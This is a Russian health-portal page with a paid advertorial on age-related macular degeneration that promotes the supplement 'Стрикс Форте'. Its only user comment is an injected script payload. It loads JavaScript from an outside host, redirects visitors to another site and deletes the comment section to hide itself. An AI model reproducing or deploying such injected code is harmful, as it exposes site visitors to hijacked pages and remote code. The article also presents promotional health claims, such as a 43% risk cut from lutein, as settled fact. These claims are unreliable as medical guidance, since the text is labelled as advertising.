Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Возрастные заболевания гл...  >>  Возрастные заболевания глаз: женщины рискуют чаще!
 
Обратная связь
 

Возрастные заболевания глаз: женщины рискуют чаще!

Размер шрифта
16 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Первые симптомы ухудшения зрения появляются после 35-40 лет. Очень важно обратить на них внимание и вовремя обратиться к врачу.

Самое распространенное заболевание глаз на сегодняшний день – это возрастная макулярная дегенерация (ВМД). Она угрожает значительным снижением зрения и инвалидностью во второй половине жизни.

Факторы риска:

  •  пол (женщины болеют чаще мужчин)
  • возраст
  • наследственная предрасположенность
  • атеросклероз
  • артериальная гипертензия
  • курение
  • воздействие прямых солнечных лучей
  • несбалансированное питание

Почему развивается ВМД?

В тканях глаза на протяжении всей жизни идет окислительный стресс. С возрастом происходит истощение защитных сил организма, и сетчатка становится чувствительна к этому окислительному стрессу, поскольку нуждается в большом количестве кислорода. В сетчатке, которая постоянно подвергается чрезвычайно высокому уровню воздействия света, вырабатываются свободные радикалы. Они разрушают белки, нуклеиновые кислоты и биологические мембраны клеток глаза.

Значительную роль в развитии ВМД играют общие и местные сосудистые заболевания, приводящие к ухудшению кровоснабжения и питания тканей глаза, например, атеросклероз.

Профилактика ВМД

  • откажитесь от курения
  • питайтесь правильно, сбросьте лишний вес
  • занимайтесь спортом
  • носите солнцезащитные очки с функцией поглощения голубого света, особенно, если вы на море, возле открытых водоемов, или в горах

Есть природные соединения, способные защитить сетчатку от окислительного стресса. Это – каротиноиды, в частности, лютеин – широко распространенный природный пигмент. Организм человека не способен его синтезировать. Зато он содержится в продуктах желтого и оранжевого цвета и в составе антиоксидантных комплексов.

Результаты многочисленных исследований доказали, что лютеин дает защиту от свободных радикалов, выполняя функцию светофильтра.

6 мг лютеина ежедневно сокращает риск ВМД на 43%.

Очень важно сочетать лютеин с растительными антиоксидантами, витаминами и минералами. Широко известным растительным антиоксидантом, оказывающим благоприятное воздействие на зрение, является экстракт черники. Активные вещества экстракта черники – антоцианозиды. Они обладают противовоспалительным и антиоксидантным действиями, укрепляют стенку сосудов, снижают проницаемость биологических барьеров, положительно влияют на процессы заживления.

На рынке России зарегистрирован антиоксидантный комплекс «Стрикс Форте» − комплекс с растительными антиоксидантами (экстракт черники, лютеин), витаминами и минералами для защиты от возрастных заболеваний глаз.

Состав «Стрикс Форте»:

102 мг экстракта черники, что соответствует 20 мг антоцианозидов, а также 3 мг лютеина.

Суточная доза − 2 таблетки − оптимальна для защиты от развития ВМД.

«Стрикс Форте» производится по специальной технологии «Актилиз». Эта технология позволяет предотвратить взаимодействие компонентов комплекса и повысить их усвоение организмом. Клинические исследования по положительному влиянию «Стрикс Форте» на состояние зрения больных ВМД и другими возрастными заболеваниями глаз проводились на базе ведущих клиник России.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.